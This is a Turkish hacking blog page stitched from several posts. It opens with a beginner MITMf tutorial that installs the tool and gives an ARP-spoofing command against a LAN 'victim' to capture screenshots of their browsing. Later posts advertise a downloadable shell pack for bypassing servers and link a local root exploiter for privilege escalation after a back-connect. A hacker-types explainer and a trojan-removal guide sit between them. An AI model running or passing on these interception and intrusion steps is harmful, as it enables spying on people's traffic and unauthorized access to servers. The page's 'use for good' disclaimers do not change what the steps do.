GondomaN


Kali linux ve başlangıç seviyesi için hack eğitim seti

TIKLA
• MITMf Nedir ?
• MITMf Kurulum
• MITMf İle Yerel Ağdaki PC'yi İzleme

MITMf Nedir ?


MITMf, MITM(Man In the Middle) Saldırılarını Yapmamıza Yarayan Bir Tooldur.

MITMf Kurulum


Öncelikle Terminali Açıp Gereken Komutları Yazalım ;


• pip install virtualenvwrapper

• apt-get install python-dev python-setuptools libpcap0.8-dev l i b n e tfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file (Boşluk Olan Harfleri Birleştirip Yazınız.)

• pip install virtualenvwrapper

• source /usr/bin/virtualenvwrapper.sh

• git clone byt3bl33d3r/MITMf

• cd MITMf && git submodule init && git submodule update --recursive

• pip install -r requirements.txt


MITMf İle Yerel Ağdaki PC'yi İzleme



Öncelikle, Yerel Ağdaki PC'mizin İPV4 Adresini Öğrenelim.







CMD'yi Açıp 'ipconfig' Yazmamız Yeterli.

İpv4 Adresimiz: 192.168.1.57

-------------------------------------------------------

Şimdi İndirdiğimiz MITMf Dosyasının İçerisine Giriş Yapalım

cd MITMf






Ardından İşleme Yavaştan Başlıyalım.

Makineyi İzleme İşlemimizi Başlatmak İçin;






Terminale 'python mitmf.py --arp --spoof --gateway 192.168.x.x --target 192.168.x.x -i eth0 --screen Komudumuzu Yazalım.

--gateway'dan Sonra Yazan yere Modem Arayüzüne Girmek İçin Yazdığımız Sayıyı Yazalım ( Örnek: 192.168.1.1)

--target'dan Sonra Hedef Makinemizin İPV4 Adresini Yazalım. ( Örnek: 192.168.1.57)

-i'den Sonra yazan eth0 Yerine wlan0'da Yazabilirsiniz Ben Kablolu İnternet Kullandığım İçin eth0 yazdım Siz Deniyerekte Çalıştırabilirsiniz.

Ardından Enter Diyip Saldırımızı Başlatalım.







Gördüğünüz Gibi Saldırı Başladı Şuan Kurban Nereye Girerse Girsin(HTTP) Resmi Bize Düşecek







Hemen Rastgele (HTTP) Bir Siteye girdim.






Gördüğünüz Gibi Hangi Siteye Girdiği Yazdı.

Hemen Girdiği Sitenin Resmini Görmek İçin;

MITMf Dosyamıza Girelim -> logs Klasörüne Girelim,






Resim Gördüğünüz Gibi Gelmiş.

Hemen Kontrol Amaçlı Resme Bakabilirsiniz


IYI AMAÇLA KULLANICAĞINIZI DÜŞÜNEREK YAYINLIYORUZ.
Hiçbir Sorumluluk Kabul Etmiyoruz Sadece Paylaşımını Yaptık, Kodlayan Kişinin Sorumluluğundadır..
Kaç Çeşit Hacker Bulunur ?
Aslına bakılırsa hacker kavramı iki ana bölümden oluşur. Whitehat hacker ve Blackhat hacker olarak tanımlayabiliriz. Whitehat hackerler genellikle buldukları açıkları ilgili birimlere ileterek kapatmalarını sağlar ve bir kuruma bağlı olarak çalışabilir. Blackhat hackerler ise kötü hackerler olarak bilinir. Genellikle sistemlerin açıklarını bularak bu açıklardan her türlü bilgi, resim, para, belge veya içeriklere erişen kişilerdir.
Alt kavramlar olarak hacker rütbeleri toplamda 6 çeşittir. Dilerseniz bu rütbelere yakından bir göz atalım:
1-) Lamer
İnternet dünyasında ismini sıkça duymuş olduğumuz lamer kavramı hacker olmaya özenmiş ancak yetenekleri bulunmayan kişiler olarak tanımlanır. Çalışma prensipleri arasında internette çeşitli web siteleri veya dökümanlara girerek üç beş numarayı ezberler ve bu numaralar ile çevresine hava atmaya çalışırlar. Ancak ezberlediği numaraların ne işe yaradığını sorduğunuzda içeriğini ve çalışma prensibini bilmediği için geçiştirir.
Konuştukları anda bilgi seviyeleri herkes tarafından anlaşılan lamerlerin amaçları çevresine ve tanıdıklarına hava atma iç güdüsü düşer. Etrafındaki kişilerin ona saygı duymasını ve ün yaparak tanınmayı istemektedir. Yaptıkları numaraları herkesin içerisinde yaparak insanlara biten halini sunarlar ve nasıl yaptıklarını anlatmazlar, çünkü anlatamazlar.
2-) Cracker
Bu kavramı da bir çok web sitesinden duymuşsunuzdur. Genel amaçlarında programlama dillerine hakim oldukları gibi, reverse engineering ismi verilen, uygulama dosyası halindeki programları değiştirerek çalışır hale getirirler. Örnek vermek gerekirse yeni çıkan bir oyunun dosyalarını editleyerek crack dosyası oluştururlar ve bu dosyayı entegre ederek oyunun sorunsuz çalışmasını sağlayan kişilerdir.
Oyun sektöründe çokça cracker bulunduğu gibi, bu kişiler her yaptıkları crack için anlaşmış oldukları şahıslar veya firmalardan ücret almaktadırlar.
hack-ekran
3-) Security Administrator
Anti-hacker olarak tanımlayabileceğimiz bu abiler, hacker ismi verilen kişilerin bilgi ve yeteneklerinin bir üst mertebesindeki kişidir. Genel olarak yaptıkları iş tanımlarında hackerlerin yöntemlerini ve uygulamalarını çözerek anti-hack işlemlerini sağlarlar. Çeşitli kurumlarda görev alabildikleri gibi, zarar vermek yerine koruma görevi üstlenmektedirler.
Meslek tanımları arasında çeşitli önlemleri bir dizi kod ve uygulamalar ile alarak adeta duvar örerler. Hack saldırıları geldiğinde bu duvarlar sayesinde içeriye girişler engellenerek koruma işlemi sağlanmış olur. Ancak her Security Administrator profesyonel olamadığı gibi, bırakmış oldukları açıkları üst düzey hackerlar gelerek kolaylıklar kırabilmektedirler.
hacker-sistem
4-) Vulnerability
Normalde ilk üç kavramı internet dünyasında duymuş olsak da, bundan sonraki kavramlara yabancı olabilirsiniz. Vulnerability‘de onlardan birisi diyebiliriz. Kelime kökeninde “korumasız, zayıf” anlamı taşıdığı gibi, sistem üzerinde yer alan açıklara denilmektedir.
Securty Hole olarak da sektörde kullanıldığı gibi, en ufak bir bugdan doğan açıkların genel tanımıdır. Örnek vermek gerekirse eğer; filtrelenmemiş HTML tagları bir php sayfasında vulnerabilty olabilir. Oluşan bug sayesinde hackerler sisteme kolaylıkla sızabilirler. Bu işlemleri sağlayan ve açıkları kapatan kişi de Vulnerable olarak bilinir.
5-) Exploit
Sistemde yer alan bir açığı kötü niyetle kullanan kişiye denilmektedir. Sözlük anlamı “sömürmek” olan Exploit, genelde URL, yazılmış kod, uygulama veya keylogger tarzı içeriklerdir. Kısacası açıkları kullanabilmek için sistemi hazır hale getiren aracı kişidir.
Asıl Exploit yazan kişiler bu zararlı uygulamaları piyasaya sürerek birinci maddede bahsetmiş olduğumuz lamer gibi kişilerin ellerine oyuncak diye verirler. Her halukarda bu kapıda hacker tanımına çıkmaktadır. Yani hackerlar bu exploitleri yazan ve o açıkları bulan kişiler olarak tanımlanırlar.
hacker-operation
6-) Script Kiddie
İnternet üzerinde veya local ağlarda hazırladıkları scriptleri uygulayan ve bu scriptleri dağıtan lamer kişilerdir. Kısa bir script yazarak sanki Microsoft’u hacklemiş gibi gösteren ve hava atmayı seven kişiler arasında yer alırlar.
Kişisel Bilgisayar Kullanıcılarının Günahı Ne ? 
Siz de haklısınız. Hiç bir şeyden haberi olmayan masum bilgisayar kullanıcımız arama motorları üzerinden yaptığı çeşitli aramalar ile belki bir program, belki bir oyun veya belge indirmek isteyecektir. Ancak bu program veya uygulamaların içine gizlenmiş bir çok zararlı yazılım bulunabilir. Peki kişisel bilgisayar kullanıcıları güvenlik konusunda hangi adımları uygulamalı ?
Kişisel Bilgisayar Kullanıcısı Profili:
* Her gün düzenli olarak maillerini kontrol eden,
* Sürekli sosyal medyada ne var ne yok diye zaman geçiren,
* İnternet üzerinde oyun, müzik veya program arayan,
* Kendi ilgi alanına giren içerikleri çeşitli web sitelerinde arayarak okuyan,
* İnternet üzerinden alışveriş yapan kişi olarak belirleyelim. Öncelikle şunu unutmamak lazım: İnternetinizin bilgisayarınıza bağlı olduğu her saniye risk altındasınız demektir.
atm-hack
Bu Kullanıcı İçin Birincil Risk Grubu
Masum görünen bu bilgisayar kullanıcımız her gün olduğu gibi maillerini kontrol ederken tarafına gönderilmiş spy, trojan, virüs veya worm tarzı dosyalar ile karşı karşıya mutlaka kalacaktır. Gezmiş olduğu web sitelerinden de arka planda otomatik olarak sızan zararlı dosyalar inebilir. Sonra, “tarayıcı virüsü temizleme” aramalarını Google üzerinde yapmaya çalışır.
Bilgisayarına almış oldukları Spy kodlar ile klavye üzerinden basmış olduğu her tuş kaydedilebilir. Bu durumda internetten alışveriş yaparken kart bilgilerini de girdiğinde geçmişler olsun diyebiliriz.
Kullanmış olduğu tarayıcıda belki de yüzlerce kayıtlı şifre olabilir. Tarayıcıya bulaşan bu zararlı kodlar tarayıcıların yedeklerini alarak karşı tarafa kısa süre içerisinde iletebilir. Sosyal medya üzerinden almış olduğu virüsler sayesinde de arkadaşlarına veya akrabalarına rezil olabilir.
hacker-sistemi
Peki Nasıl Korunmalı ?
* Spy kodu içeren uygulamalara karşı bilgisayarınızda en az 1 adet Firewall ve 1 adet güncel antivirüs programı kurulu olmalıdır.
* İçeriğini bilmediğiniz veya tanımadığınız kişilerden kesinlikle .exe gibi uzantılara sahip uygulamaları bilgisayarınıza indirmemelisiniz.
* İçeriğine bir türlü güvenemediğiniz web sitelerinin uygulamalarına izin verilmemesi gerekir. İzin verildiği taktirde tarayıcı üzerinden reklam virüsleri bulaşabilir.
* Tarayıcınız üzerinde kesinlikle önemli şifrelerinizi kaydetmemeniz gerekir. 
* Kullanılan şifreler en az 8 haneli seçilmedi gerektiği gibi, büyük küçük harf, rakam ve semboller içermelidir. Bir şifre ne kadar zor olursa, çözülmesi o kadar da zor olur.
* Her zaman spymastersnake.org gibi kaliteli ve güncellenen güvenlik sitelerini ziyaret edin. Son teknolojileri ve güvenlik önlemlerini buralardan öğrenerek uygulayabilirsiniz.
İnsan başına gelmeden her şeyi toz pembe görür. Ancak önemli bilgilerinin başkasının eline geçtiğini öğrendiğinizde işler çok farklı sarabilir. Zira her gün kart bilgisi çalınan kişilerin adlarına çekilmiş binlerce dolar kredileri görebiliyoruz. Bunlar hacker dünyası için çok ufak bir örnek. Düşünsenize, bir sabah uyanıyorsunuz ve 250 bin dolar kredi adınıza çekilmiş. İsterseniz bir hayal edin, sonra cevabı bulursanız, bizimle iletişime geçebilirsiniz 🙂

Defacer: Defacer ,web hacking alanında uzman kişilere denir. Web Hack İle İlgilenen Kişilere Bu Lakap Takılmaktadır.

Hacker: Hacker ya da bilgisayar korsanı, şahsî bilgisayarlara veya çeşitli kurum ve kuruluşlara ait bilgisayarlara ve ağlara izinsiz olarak giriş yapan kişi.
Merhaba Arkadaşlar Tamamen Kendi Hazırladığım Ve İşinize Yarıyıcağını Düşündüğüm HackPack Sizlerle Indırme Linki Aşşağıda Bu Hack Pack İle Istediğiniz Hedefte Açık Tarıyabilir Ve Sunucudan Bypasslıyıp Hedefe Ulaşabiliceğiniz Sheller Var. Bunları İyi Amaç İle Kullanıcağınızı Düşünerekten Yayınlıyoruz. Yapıcağınız Hiç bir şeyden ben sorumlu değiliz. Sorumluluk Kabul Edilmez. Tamamen Kendi Sorumluluğunuzdadır.




Merhaba arkadaşlar
Ekli komut dosyası, BackConnect saldırı sunucusu adımını tamamlamada sorun yaşayan arkadaşlar içindir
Bu komut dosyasını sunucuya yükleyerek ve komut dosyası ortamını çalıştırdıktan sonra, derlenmiş yerel kökü komut dosyasına ekleyin ve Gönder'i tıklatın.
server'da erişimin artacağını göreceksiniz

> `https://dosya.co/rhc33p0f8h6g/[local.root.exploiter.t]_NoBC.rar.html`

[local.root.exploiter]

28 Mart 2020 Cumartesi

trojen-virusu-nasil-kaldirilir
Trojan virüsünün bilgisayarınızdan veya akıllı telefonunuzdan nasıl çıkarılacağını bilmeniz gerekiyorsa, bir Trojan virüsünün ne olduğunu ve bir sistemi nasıl etkilediğini öğrenmek önemlidir.

Truva virüsü temizleme işlemi, bir Truva virüsü virüsünün ne olduğunu, Truva virüslerinin bilgisayarınızı nasıl etkilediğini ve hangi virüs bulaşmasından etkilendiğini anlamayı gerektirir.


Truva Virüsü Nedir?

Bilgisayarınız daha yavaş çalışıyorsa ya da açılır pencereler tuhaf DLL (veya .dll) hatalarıyla görünüyorsa, muhtemelen Trojan virüsü bulaştırılmış olabilirsiniz.

Bu tür kötü amaçlı yazılım bulaşması, kullanıcının virüs kapması için bir işlem yapmasını gerektirir. Bu genellikle internetten ücretsiz yazılım indirmeyi veya bir e-postadan ek indirmeyi ve dosyayı çalıştırmayı içerir.


Truva ismi, Yunan hikayesinin, Yunanlıların Truva kentine girip savaşı kazanmak için inşa ettikleri dev bir tahta atı hakkında gelmesidir.

Hikaye devam ederken, Yunanlılar tahta atı askerlerle doldurdu ve sonra atı bir hediye olarak Truva’nın kapısında bıraktı. Bir kez kapılardan içeri giren askerler attan çıkıp şehre saldırmak için akşama kadar beklediler.

Aynı şekilde, bir Trojan virüsü genellikle bilgisayarınıza indirmek ve çalıştırmak isteyebileceğiniz bir yazılıma eklenir. Truva virüsleri, Windows yardımcı programlarına, ücretsiz oyunlara ve diğer birçok yazılım türüne eklenebilir.

Bir Truva Virüsünden Etkilenmiş miyim?

Trojan virüsü temizleme işleminize başlamadan önce, bilgisayarınızın virüsünün bu tür bir virüs olup olmadığını belirlemeniz gerekir.

Son zamanlarda yeni bir yazılım yüklediniz. Son zamanlarda garip davranış başlamadan önce bilgisayarınıza yeni bir yazılım yüklediyseniz, sorun bir Trojan virüsü olabilir.
  • Başlat düğmesini seçin, Denetim Masası yazın ve Denetim Masası uygulamasını açın.
  • Programlar ve Özellikler’i seçin.
  • Programları yüklendikleri tarihe göre sıralamak için Yüklendi sütununu seçin.
Tanımadığınız ya da internetten ücretsiz indirmeyi hatırladığınız ve şüpheli olabileceğinizi çok yakın zamanda yüklediğiniz uygulamaları arayın. Bu programı seçin ve ardından uygulamayı kaldırmak için listenin üstündeki Kaldır düğmesini seçin.

Not: Trojan “taşıyıcı” programını kaldırmak, Trojan virüsünü bilgisayarınızdan tamamen kaldırmayabilir, ancak bu iyi bir başlangıçtır. Ayrıca, Truva atının kaldırıldıktan sonra yeniden yüklenmemesini de sağlar.
  • Kayıt defterini kontrol et. Bazen bir Truva virüsü sessizce yüklenir ve yüklü programlar listesinde görünmeyebilir. Kayıt defterinde bulmak mümkün olabilir. Başlat menüsünü seçin, run yazın ve Çalıştır uygulamasını seçin. Çalıştır penceresinde, regedit yazın ve Tamam‘ı seçin.
  • HKEY_LOCAL_MACHINE \ SOFTWARE \ adresini bulmak için kayıt defteri ağacında gezinin. Uygulamalar listesini aşağı kaydırın ve olağandışı yazılım adlarını arayın. Bu uygulamanın kayıt defteri girdisini silin. Truva virüsü olabileceğinden şüphelendiğiniz programları araştırmak için Google’ı kullanın.
  • Genellikle, belirli Trojan virüsleri için Google sonuçları, bu virüsleri temizlemeye yarayan programlar sağlayan web sitelerini içerir. Bu, özellikle büyük antivirüs sağlayıcılarının henüz bir düzeltme eki oluşturmadığı çok yeni Truva virüsleri için kullanışlıdır. Örneğin, Symantec, Trojan.Kotver virüsü için ücretsiz bir temizleme aracı sağlar.
Not: Yalnızca trojan temizleme araçlarını Microsoft, Symantec veya McAfee gibi iyi bilinen şirketlerden indirdiğinizden emin olun. Asla ek Trojan virüsleri içerdiğinden, hiçbir zaman ücretsiz yazılım indirme sitelerinden yardımcı programlar yüklemeyin!

Truva Virüsü Kaldırma İşlemi

Taşıyıcı programı kaldırmış ve kayıt defteri anahtarını kaldırmış olsanız bile, sisteminizde hala Trojan virüs dosyaları olabilir. Bunlardan bazıları, çekirdek sistem dosyalarınızın bazılarının yerini bile almış olabilir.

Hem Microsoft hem de Antivirüs sağlayıcıları tanım kitaplarını sık sık en son Truva atlarıyla güncellerler. Yeni bulaştığınız bir Trojan’ı kaldırmanın en hızlı yolu, bunlarla tam bir sistem taraması yapmaktır.a

// Copyright © ɢoɴdoмαɴ $εcuƦι†ψ //Anime-Note//Powered by GondomaN // Hiçbir Sorumluluk Kabul Etmiyoruz Sadece Paylaşımları Yaptık Kodlayan Kişinin Sorumluluğundadır.. GondomaN Security //